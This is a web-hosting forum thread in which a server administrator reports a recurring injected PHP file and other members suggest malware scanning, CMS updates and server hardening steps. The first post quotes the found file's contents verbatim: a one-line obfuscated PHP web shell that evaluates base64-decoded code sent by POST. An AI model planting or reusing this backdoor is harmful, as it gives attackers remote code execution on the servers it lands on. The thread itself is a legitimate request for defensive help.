Big problem

K

Kevin Jaspers

Verified User
Joined
Jan 23, 2012
Messages
64
Since this week i got a problem.
on every acount on my server stays a map named css with a file in it (7c32.php) and in this file stays the code
<?php if(isset($_POST["cod\x65"])){eval(base64_decode($_POST["co\x64e"]));}?>

But if i delete it, its within 3 hours back, i dont know what to do.

I think someting is injecting my server.
What i already did is, deleting al these files,maps and changed admin password.

But the files already back.

Does somebody know this problem and what to do to prevent this.

Please help me.

Already thanks.

Greats, Kevin
 
The public_html map is 711 but its stil coming trouth.

How can i use this tools?

feeling sick of this, dont know why this is.
 
Last edited:
Kevin Jaspers said:
How can i use this tools?
Click to expand...

You should always keep your sites (Joomla CMS, Drupal CMS, WordPress) updated and actual, including all modules, and components. The malicious files are uploaded/created I'd rather say through a vulnerability of a CMS you are running there.

I'd suggest:

1. Installing Linux Malware Detect (maldet) as well as clamAV. And checking homedirs on daily bases.
2. Installing and configuring ModSecurity.
3. Securing /tmp, /var/tmp
4. Installing and configuring CSF/LFD
5. Securing PHP
6. Forbidding upload of PHP scripts (by mime, and other signs), as some attackers hide PHP code in GIF files.

Note, Andrea as well as me (and other guys here) offer a commercial service. So if you need a professional solution you might need to hire somebody of us. Feel free to PM for quote.
 
The thing is that i'll it by my self because i want to learn someting but thnx.
How can i do al these things above and what recommend you to do.

Already thanks for helping.

Greats. Kevin
 
After this all i got the problem back.
On some user, allmost every user.
Have the weird file's after these changes.

What can i did...
1. Installing Linux Malware Detect (maldet)
3. Securing /tmp, /var/tmp
4. Installing and configuring CSF/LFD
5. Securing PHP
That is what i did.

The other things i didn't know how to do that en configure.

Already thanks.
 
Last edited:
This is a script used by hackers to send spam email.

If you have any Joomla or Wordpress installations, update them. JCE editor for Joomla has quite a few security issues that allow third persons to upload files without logging in. Do the same for Wordpress plugins and themes.
 
Okay thanks, I'll keep this in my mind.
I'll send my users an email.

How can i controll outdated stuff from user?
Is there an command or program for?
 
I did what you say about server-status.
But what can i see with this?

And i have SuPhp installed, is this good?
 
Hello everyone,

As i sad i had installed maldet, after scanning i was shocked!
Everyting is deleted so, i think its good for now.
We should see.

Already thanks
 
server-status will show every open connection for apache... Might be useful.....Usually you'll see many connections to a domain if it is targeted, then I'd suggest reading that domain logs for any cross-scripting or extension hits.
 
Due to security reasons, I would limit the access to server-status to your own ip/hostname and localhost.
 
It could be your problem is over now. At least if your server isn't rooted. So then you won't see anything suspicious.

I would install mod_ruid2 in your case, at least you have more chance in discovering which user's script are being abused when it would happen again.
http://wiki.amservers.nl/Mod_ruid2
 
@Richard,

Kevin has SuPhp installed already.


@Kevin,

As i sad i had installed maldet, after scanning i was shocked!
Everyting is deleted so, i think its good for now.
Click to expand...

Now you should care of a protection against malware being uploaded again. For the purposes you might want to use:

either this http://configserver.com/cp/cxs.html (commercial software)
or modsecurity+maldet+clamav (free)

Or even deny uploading of PHP scripts via POST.
 
You must log in or register to reply here.
Back
Top